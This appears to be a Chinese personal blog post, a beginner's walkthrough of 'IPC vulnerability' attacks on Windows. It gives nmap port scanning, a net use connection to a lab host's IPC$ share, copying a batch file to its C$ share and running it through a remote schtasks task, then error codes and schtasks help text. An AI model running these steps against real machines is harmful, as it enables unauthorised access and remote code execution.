<!doctype html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta name="baidu-site-verification" content="bk1wz1wzS4">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">



<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">












  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css">


  <meta name="keywords" content="学习,">








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.0">






<meta name="description" content="扫描端口使用当前最流行的端口扫描工具nmap扫描137,138,139,445端口，看是否开启了这些端口，如果开启了这些端口，说明存在ipc漏洞。 建立漏洞连接net use \192.168.83.129\ipc\$ “password” /U:”liuzhihao”查询共享资源net view \192.168.83.129查询远程ip的当前时间net time \192.168.83.129">
<meta name="keywords" content="学习">
<meta property="og:type" content="article">
<meta property="og:title" content="ipc漏洞攻击">
<meta property="og:url" content="https://youandme66.github.io/2017/05/17/second/index.html">
<meta property="og:site_name" content="腊月的季节">
<meta property="og:description" content="扫描端口使用当前最流行的端口扫描工具nmap扫描137,138,139,445端口，看是否开启了这些端口，如果开启了这些端口，说明存在ipc漏洞。 建立漏洞连接net use \192.168.83.129\ipc\$ “password” /U:”liuzhihao”查询共享资源net view \192.168.83.129查询远程ip的当前时间net time \192.168.83.129">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2017-05-19T00:51:44.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="ipc漏洞攻击">
<meta name="twitter:description" content="扫描端口使用当前最流行的端口扫描工具nmap扫描137,138,139,445端口，看是否开启了这些端口，如果开启了这些端口，说明存在ipc漏洞。 建立漏洞连接net use \192.168.83.129\ipc\$ “password” /U:”liuzhihao”查询共享资源net view \192.168.83.129查询远程ip的当前时间net time \192.168.83.129">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: 'youandme'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://youandme66.github.io/2017/05/17/second/">





  <title> ipc漏洞攻击 | 腊月的季节 </title>
  <script>
  (function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
  })();
</script>
</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  










  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">腊月的季节</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle"></p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup">
 <span class="search-icon fa fa-search"></span>
 <input type="text" id="local-search-input">
 <div id="local-search-result"></div>
 <span class="popup-btn-close">close</span>
</div>


    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope="" itemtype="http://schema.org/Article">
  <link itemprop="mainEntityOfPage" href="https://youandme66.github.io/2017/05/17/second/">

  <span style="display:none" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
    <meta itemprop="name" content="腊月的季节">
    <meta itemprop="description" content="">
    <meta itemprop="image" content="/uploads/avatar.jpg">
  </span>

  <span style="display:none" itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="腊月的季节">
    <span style="display:none" itemprop="logo" itemscope="" itemtype="http://schema.org/ImageObject">
      <img style="display:none;" itemprop="url image" alt="腊月的季节" src="">
    </span>
  </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                ipc漏洞攻击
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2017-05-17T00:00:00+08:00">
                2017-05-17
              </time>
            

            

            
          </span>

          
            <span class="post-category">
              <span class="post-meta-divider">|</span>
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/安全/" itemprop="url" rel="index">
                    <span itemprop="name">安全</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
            <!--noindex-->
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                  <a href="/2017/05/17/second/#comments" itemprop="discussionUrl">
                    <span class="post-comments-count hc-comment-count" data-xid="2017/05/17/second/" itemprop="commentsCount"></span>
                  </a>
                </span>
              </span>
              <!--/noindex-->
            
          

          

          
          
             <span id="/2017/05/17/second/" class="leancloud_visitors" data-flag-title="ipc漏洞攻击">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               <span class="post-meta-item-text">阅读次数 </span>
               <span class="leancloud-visitors-count"></span>
              </span>
          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="扫描端口"><a href="#扫描端口" class="headerlink" title="扫描端口"></a>扫描端口</h3><p>使用当前最流行的端口扫描工具nmap扫描137,138,139,445端口，看是否开启了这些端口，如果开启了这些端口，说明存在ipc漏洞。</p>
<h3 id="建立漏洞连接"><a href="#建立漏洞连接" class="headerlink" title="建立漏洞连接"></a>建立漏洞连接</h3><p>net use \192.168.83.129\ipc\$ “password” /U:”liuzhihao”<br>查询共享资源<br>net view \192.168.83.129<br>查询远程ip的当前时间<br>net time \192.168.83.129<br>经过了IPC连接那么就可以复制文件到远程主机上<br>copy i:\1.bat \192.168.83.129\c\$\myjishi<br>再次获取系统时间，为远程主机添加任务计划<br>schtasks /create /tn “test” /tr c:\myjishi\1.bat /sc once /st 09:58:30 /s 192.168.83.129 /u administrator /p liuzhihao<br>ipc漏洞攻击常见错误:<br>ipc$连接失败的常见原因</p>
<p>1 IPC连接是Windows NT及以上系统中特有的功能，由于其需要用到Windows NT中很多DLL函数，所以不能在Windows 9.x/Me系统中运行，也就是说只有nt/2000/xp才可以相互建立ipc$连接，98/me是不能建立ipc$连接的；</p>
<p>2 如果想成功的建立一个ipc$连接，就需要响应方开启ipc$共享，即使是空连接也是这样，如果响应方关闭了ipc$共享，将不能建立连接；</p>
<p>3 连接发起方未启动Lanmanworkstation服务（显示名为：Workstation）：它提供网络链结和通讯，没有它发起方无法发起连接请求；</p>
<p>4 响应方未启动Lanmanserver服务（显示名为：Server）：它提供了 RPC 支持、文件、打印以及命名管道共享，ipc$依赖于此服务，没有它主机将无法响应发起方的连接请求，不过没有它仍可发起ipc$连接；</p>
<p>5 响应方未启动NetLogon，它支持网络上计算机 pass-through 帐户登录身份（不过这种情况好像不多）；</p>
<p>6 响应方的139，445端口未处于监听状态或被防火墙屏蔽；</p>
<p>7 连接发起方未打开139，445端口；</p>
<p>8 用户名或者密码错误：如果发生这样的错误，系统将给你类似于’无法更新密码’这样的错误提示（显然空会话排除这种错误）；</p>
<p>9 命令输入错误：可能多了或少了空格，当用户名和密码中不包含空格时两边的双引号可以省略，如果密码为空，可以直接输入两个引号””即可；</p>
<p>10 如果在已经建立好连接的情况下对方重启计算机，那么ipc$连接将会自动断开，需要重新建立连接。 </p>
<p>另外,你也可以根据返回的错误号分析原因： </p>
<p>错误号5，拒绝访问：很可能你使用的用户不是管理员权限的；<br>错误号51，Windows无法找到网络路径：网络有问题；<br>错误号53，找不到网络路径：ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；<br>错误号67，找不到网络名：你的lanmanworkstation服务未启动或者目标删除了ipc$；<br>错误号1219，提供的凭据与已存在的凭据集冲突：你已经和对方建立了一个ipc$，请删除再连；<br>错误号1326，未知的用户名或错误密码：原因很明显了；<br>错误号1792，试图登录，但是网络登录服务没有启动：目标NetLogon服务未启动；<br>错误号2242，此用户的密码已经过期：目标有帐号策略，强制定期要求更改密码。 </p>
<h3 id="schtasks"><a href="#schtasks" class="headerlink" title="schtasks"></a>schtasks</h3><p>SCHTASKS /Create [/S system [/U username [/P [password]]]]</p>
<pre><code>[/RU username [/RP password]] /SC schedule [/MO modifier] [/D day]

[/M months] [/I idletime] /TN taskname /TR taskrun [/ST starttime]

[/RI interval] [ {/ET endtime | /DU duration} [/K] [/XML xmlfile] [/V1]]

[/SD startdate] [/ED enddate] [/IT | /NP] [/Z] [/F] [/HRESULT] [/?]
</code></pre><p>描述:</p>
<pre><code>允许管理员在本地或远程系统上创建计划任务。
</code></pre><p>参数列表:</p>
<pre><code>/S   system        指定要连接到的远程系统。如果省略这个

                   系统参数，默认是本地系统。

/U   username      指定应在其中执行 SchTasks.exe 的用户上下文。

/P   [password]    指定给定用户上下文的密码。如果省略则

                   提示输入。

/RU  username      指定任务在其下运行的“运行方式”用户

                   帐户(用户上下文)。对于系统帐户，有效 

                   值是 &quot;&quot;、&quot;NT AUTHORITY\SYSTEM&quot; 或 

                   &quot;SYSTEM&quot;。

                   对于 v2 任务，&quot;NT AUTHORITY\LOCALSERVICE&quot;和

                   &quot;NT AUTHORITY\NETWORKSERVICE&quot;以及常见的 SID

                     对这三个也都可用。

/RP  [password]    指定“运行方式”用户的密码。要提示输

                   入密码，值必须是 &quot;*&quot; 或无。系统帐户会忽略该

                   密码。必须和 /RU 或 /XML 开关一起使用。
</code></pre><p>/RU/XML    /SC   schedule     指定计划频率。</p>
<pre><code>                   有效计划任务:  MINUTE、 HOURLY、DAILY、WEEKLY、 

                   MONTHLY, ONCE, ONSTART, ONLOGON, ONIDLE, ONEVENT.

/MO   modifier     改进计划类型以允许更好地控制计划重复

                   周期。有效值列于下面“修改者”部分中。

/D    days         指定该周内运行任务的日期。有效值: 

                   MON、TUE、WED、THU、FRI、SAT、SUN

                   和对 MONTHLY 计划的 1 - 31

                   (某月中的日期)。通配符“*”指定所有日期。

/M    months       指定一年内的某月。默认是该月的第一天。

                   有效值: JAN、FEB、MAR、APR、MAY、JUN、

                   JUL、 AUG、SEP、OCT、NOV  和 DEC。通配符

                   “*” 指定所有的月。

/I    idletime     指定运行一个已计划的 ONIDLE 任务之前

                   要等待的空闲时间。

                   有效值范围: 1 到 999 分钟。

/TN   taskname     指定唯一识别这个计划任务的名称。

/TR   taskrun      指定在这个计划时间运行的程序的路径

                   和文件名。

                   例如: C:\windows\system32\calc.exe

/ST   starttime    指定运行任务的开始时间。

                   时间格式为 HH:mm (24 小时时间)，例如 14:30 表示

                   2:30 PM。如果未指定 /ST，则默认值为

                   当前时间。/SC ONCE 必需有此选项。

/RI   interval     用分钟指定重复间隔。这不适用于

                   计划类型: MINUTE、HOURLY、

                   ONSTART, ONLOGON, ONIDLE, ONEVENT.

                   有效范围: 1 - 599940 分钟。

                   如果已指定 /ET 或 /DU，则其默认值为

                   10 分钟。

/ET   endtime      指定运行任务的结束时间。

                   时间格式为 HH:mm (24 小时时间)，例如，14:50 表示 2:50 PM。

                   这不适用于计划类型: ONSTART、

                   ONLOGON, ONIDLE, ONEVENT.

/DU   duration     指定运行任务的持续时间。

                   时间格式为 HH:mm。这不适用于 /ET 和

                   计划类型: ONSTART, ONLOGON, ONIDLE, ONEVENT.

                   对于 /V1 任务，如果已指定 /RI，则持续时间默认值为

                   1 小时。

/K                 在结束时间或持续时间终止任务。

                   这不适用于计划类型: ONSTART、

                   ONLOGON, ONIDLE, ONEVENT. 

                   必须指定 /ET 或 /DU。

/SD   startdate    指定运行任务的第一个日期。

                   格式为 yyyy/mm/dd。默认值为

                   当前日期。这不适用于计划类型: ONCE、

                   ONSTART, ONLOGON, ONIDLE, ONEVENT.

/ED   enddate      指定此任务运行的最后一天的日期。

                   格式是 yyyy/mm/dd。这不适用于计划类型: 

                    ONCE、ONSTART、ONLOGON、ONIDLE。

/EC   ChannelName  为 OnEvent 触发器指定事件通道。

/IT                仅有在 /RU 用户当前已登录且

                   作业正在运行时才可以交互式运行任务。

                   此任务只有在用户已登录的情况下才运行。

/NP                不储存任何密码。任务以给定用户的身份

                   非交互的方式运行。只有本地资源可用。

/Z                 标记在最终运行完任务后删除任务。

/XML  xmlfile      从文件的指定任务 XML 中创建任务。

                   可以组合使用 /RU 和 /RP 开关，或者在任务 XML 已包含

                   主体时单独使用 /RP。

/V1                创建 Vista 以前的平台可以看见的任务。

                   不兼容 /XML。

/F                 如果指定的任务已经存在，则强制创建

                   任务并抑制警告。

/RL   level        为作业设置运行级别。有效值为

                   LIMITED 和 HIGHEST。默认值为 LIMITED。

/DELAY delaytime   指定触发触发器后延迟任务运行的

                   等待时间。时间格式为

                   mmmm:ss。此选项仅对计划类型

                   ONSTART, ONLOGON, ONEVENT.

/HRESULT          为获得更出色的故障诊断能力，处理退出代码

                   将采用 HRESULT 格式。

/?                 显示此帮助消息。
</code></pre><p>修改者: 按计划类型的 /MO 开关的有效值:</p>
<pre><code>MINUTE:  1 到 1439 分钟。

HOURLY:  1 - 23 小时。

DAILY:   1 到 365 天。

WEEKLY:  1 到 52 周。

ONCE:    无修改者。

ONSTART: 无修改者。

ONLOGON: 无修改者。

ONIDLE:  无修改者。

MONTHLY: 1 到 12，或

         FIRST, SECOND, THIRD, FOURTH, LAST, LASTDAY。

ONEVENT:  XPath 事件查询字符串。
</code></pre><p>示例:</p>
<pre><code>==&gt; 在远程机器 &quot;ABC&quot; 上创建计划任务 &quot;doc&quot;，

    该机器每小时在 &quot;runasuser&quot; 用户下运行 notepad.exe。

    SCHTASKS /Create /S ABC /U user /P password /RU runasuser

             /RP runaspassword /SC HOURLY /TN doc /TR notepad 

==&gt; 在远程机器 &quot;ABC&quot; 上创建计划任务 &quot;accountant&quot;，

    在指定的开始日期和结束日期之间的开始时间和结束时间内，

    每隔五分钟运行 calc.exe。

    SCHTASKS /Create /S ABC /U domain\user /P password /SC MINUTE

             /MO 5 /TN accountant /TR calc.exe /ST 12:00 /ET 14:00

             /SD 06/06/2006 /ED 06/06/2006 /RU runasuser /RP userpassword

==&gt; 创建计划任务 &quot;gametime&quot;，在每月的第一个星期天 

    运行“空当接龙”。

    SCHTASKS /Create /SC MONTHLY /MO first /D SUN /TN gametime 

             /TR c:\windows\system32\freecell

==&gt; 在远程机器 &quot;ABC&quot; 创建计划任务 &quot;report&quot;，

    每个星期运行 notepad.exe。

    SCHTASKS /Create /S ABC /U user /P password /RU runasuser

             /RP runaspassword /SC WEEKLY /TN report /TR notepad.exe

==&gt; 在远程机器 &quot;ABC&quot; 创建计划任务 &quot;logtracker&quot;，

    每隔五分钟从指定的开始时间到无结束时间，

    运行 notepad.exe。将提示输入 /RP 

    密码。

    SCHTASKS /Create /S ABC /U domain\user /P password /SC MINUTE

             /MO 5 /TN logtracker 

             /TR c:\windows\system32\notepad.exe /ST 18:30

             /RU runasuser /RP

==&gt; 创建计划任务 &quot;gaming&quot;，每天从 12:00 点开始到

    14:00 点自动结束，运行 freecell.exe。

    SCHTASKS /Create /SC DAILY /TN gaming /TR c:\freecell /ST 12:00

             /ET 14:00 /K

==&gt; 创建计划任务“EventLog”以开始运行 wevtvwr.msc

    只要在“系统”通道中发布事件 101

    SCHTASKS /Create /TN EventLog /TR wevtvwr.msc /SC ONEVENT

             /EC System /MO *[System/EventID=101] 

==&gt; 文件路径中可以加入空格，但需要加上两组引号，

    一组引号用于 CMD.EXE，另一组用于 SchTasks.exe。用于 CMD

    的外部引号必须是一对双引号；内部引号可以是一对单引号或

    一对转义双引号:

    SCHTASKS /Create 

       /tr &quot;&apos;c:\program files\internet explorer\iexplorer.exe&apos; 

       \&quot;c:\log data\today.xml\&quot;&quot; ... 
</code></pre><h3 id="cmd命令提升之管理员"><a href="#cmd命令提升之管理员" class="headerlink" title="cmd命令提升之管理员"></a>cmd命令提升之管理员</h3><p>runas /user:administrator cmd<br>输入密码即可</p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>


    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/学习/" rel="tag"># 学习</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/05/16/first/" rel="next" title="C语言网络编程">
                <i class="fa fa-chevron-left"></i> C语言网络编程
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/05/17/first/" rel="prev" title="ping命令">
                ping命令 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
        <!-- JiaThis Button BEGIN -->
<div class="jiathis_style">
  <a class="jiathis_button_tsina"></a>
  <a class="jiathis_button_tqq"></a>
  <a class="jiathis_button_weixin"></a>
  <a class="jiathis_button_cqq"></a>
  <a class="jiathis_button_douban"></a>
  <a class="jiathis_button_renren"></a>
  <a class="jiathis_button_qzone"></a>
  <a class="jiathis_button_kaixin001"></a>
  <a class="jiathis_button_copy"></a>
  <a href="http://www.jiathis.com/share" class="jiathis jiathis_txt jiathis_separator jtico jtico_jiathis" target="_blank"></a>
  <a class="jiathis_counter_style"></a>
</div>
<script type="text/javascript">
  var jiathis_config={
    hideMore:false
  }
</script>
<script type="text/javascript" src="http://v3.jiathis.com/code/jia.js" charset="utf-8"></script>
<!-- JiaThis Button END -->

      
    </div>
  </div>


          </div>
          

  <p>热评文章</p>
  <div class="ds-top-threads" data-range="weekly" data-num-items="4"></div>


          
  <div class="comments" id="comments">
    
      <div id="hypercomments_widget"></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image" src="/uploads/avatar.jpg" alt="腊月的季节">
          <p class="site-author-name" itemprop="name">腊月的季节</p>
          <p class="site-description motion-element" itemprop="description">腊月的季节的个人博客</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">160</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">72</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">13</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              我的其他足迹
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://blog.csdn.net/qq_33433029" title="CSDN博客" target="_blank">CSDN博客</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://github.com/youandme66" title="GitHub" target="_blank">GitHub</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.jianshu.com/users/767025e0c4df/timeline" title="我的简书" target="_blank">我的简书</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.zhihu.com/people/liu-zhi-hao-85-39/activities" title="我的知乎" target="_blank">我的知乎</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#扫描端口"><span class="nav-number">1.</span> <span class="nav-text">扫描端口</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#建立漏洞连接"><span class="nav-number">2.</span> <span class="nav-text">建立漏洞连接</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#schtasks"><span class="nav-number">3.</span> <span class="nav-text">schtasks</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#cmd命令提升之管理员"><span class="nav-number">4.</span> <span class="nav-text">cmd命令提升之管理员</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">
  
  &copy;  2016 - 
  <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">腊月的季节</span>
</div>


<div class="powered-by">
   <a class="theme-link" href="http://www.jianshu.com/users/767025e0c4df/timeline">我的简书</a> 
</div>

<div class="theme-info">
  链接 -
  <a class="theme-link" href="https://www.zhihu.com/people/liu-zhi-hao-85-39/activities">
    我的知乎
  </a>
</div>


        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.0"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.0"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.0"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.0"></script>


  



  




	

		<script type="text/javascript">
		_hcwp = window._hcwp || [];

		_hcwp.push({widget:"Bloggerstream", widget_id: 93245, selector:".hc-comment-count", label: "{\%COUNT%\}" });

		
		_hcwp.push({widget:"Stream", widget_id: 93245, xid: "2017/05/17/second/"});
		

		(function() {
		if("HC_LOAD_INIT" in window)return;
		HC_LOAD_INIT = true;
		var lang = (navigator.language || navigator.systemLanguage || navigator.userLanguage || "en").substr(0, 2).toLowerCase();
		var hcc = document.createElement("script"); hcc.type = "text/javascript"; hcc.async = true;
		hcc.src = ("https:" == document.location.protocol ? "https" : "http")+"://w.hypercomments.com/widget/hc/93245/"+lang+"/widget.js";
		var s = document.getElementsByTagName("script")[0];
		s.parentNode.insertBefore(hcc, s.nextSibling);
		})();
		</script>

	





  
  
  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length == 0) {
      search_path = "search.xml";
    }
    var path = "/" + search_path;
    // monitor main search box;

    function proceedsearch() {
      $("body").append('<div class="popoverlay">').css('overflow', 'hidden');
      $('.popup').toggle();
    }
    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';
      $.ajax({
        url: path,
        dataType: "xml",
        async: true,
        success: function( xmlResponse ) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = $( "entry", xmlResponse ).map(function() {
            return {
              title: $( "title", this ).text(),
              content: $("content",this).text(),
              url: $( "url" , this).text()
            };
          }).get();
          var $input = document.getElementById(search_id);
          var $resultContent = document.getElementById(content_id);
          $input.addEventListener('input', function(){
            var matchcounts = 0;
            var str='<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length > 1) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var content_index = [];
                var data_title = data.title.trim().toLowerCase();
                var data_content = data.content.trim().replace(/<[^>]+>/g,"").toLowerCase();
                var data_url = decodeURIComponent(data.url);
                var index_title = -1;
                var index_content = -1;
                var first_occur = -1;
                // only match artiles with not empty titles and contents
                if(data_title != '') {
                  keywords.forEach(function(keyword, i) {
                    index_title = data_title.indexOf(keyword);
                    index_content = data_content.indexOf(keyword);
                    if( index_title >= 0 || index_content >= 0 ){
                      isMatch = true;
                      if (i == 0) {
                        first_occur = index_content;
                      }
                    }

                  });
                }
                // show search results
                if (isMatch) {
                  matchcounts += 1;
                  str += "<li><a href='"+ data_url +"' class='search-result-title'>"+ data_title +"</a>";
                  var content = data.content.trim().replace(/<[^>]+>/g,"");
                  if (first_occur >= 0) {
                    // cut out 100 characters
                    var start = first_occur - 20;
                    var end = first_occur + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if(start == 0){
                      end = 50;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    var match_content = content.substring(start, end);
                    // highlight all keywords
                    keywords.forEach(function(keyword){
                      var regS = new RegExp(keyword, "gi");
                      match_content = match_content.replace(regS, "<b class=\"search-keyword\">"+keyword+"</b>");
                    });

                    str += "<p class=\"search-result\">" + match_content +"...</p>"
                  }
                  str += "</li>";
                }
              })};
            str += "</ul>";
            if (matchcounts == 0) { str = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>' }
            if (keywords == "") { str = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>' }
            $resultContent.innerHTML = str;
          });
          proceedsearch();
        }
      });}

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched == false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(function(e){
      $('.popup').hide();
      $(".popoverlay").remove();
      $('body').css('overflow', '');
    });
    $('.popup').click(function(e){
      e.stopPropagation();
    });
  </script>


  
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
